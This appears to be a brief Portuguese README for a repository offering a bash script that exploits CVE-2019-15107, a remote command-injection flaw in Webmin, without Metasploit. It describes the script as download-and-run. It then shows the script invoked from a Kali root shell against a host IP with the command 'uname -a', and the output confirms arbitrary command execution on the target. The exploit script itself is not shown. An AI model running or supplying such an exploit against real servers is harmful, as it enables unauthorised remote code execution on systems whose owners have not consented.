
Este repositório contém um pequeno script em bash para explorar o CVE-2019-15107 sem usar o metasploit. O uso é bastante simples, basta baixar e executar, sem dependências
root@kali:~# ./webmin-CVE-2019-15107.sh 10.10.73.185 'uname -a'
<h1>Error - Perl execution failed</h1>
<p>Your password has expired, and a new one must be chosen.Linux source 4.15.0-108-generic #109-Ubuntu SMP Fri Jun 19 11:33:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
</p>
root@kali:~#```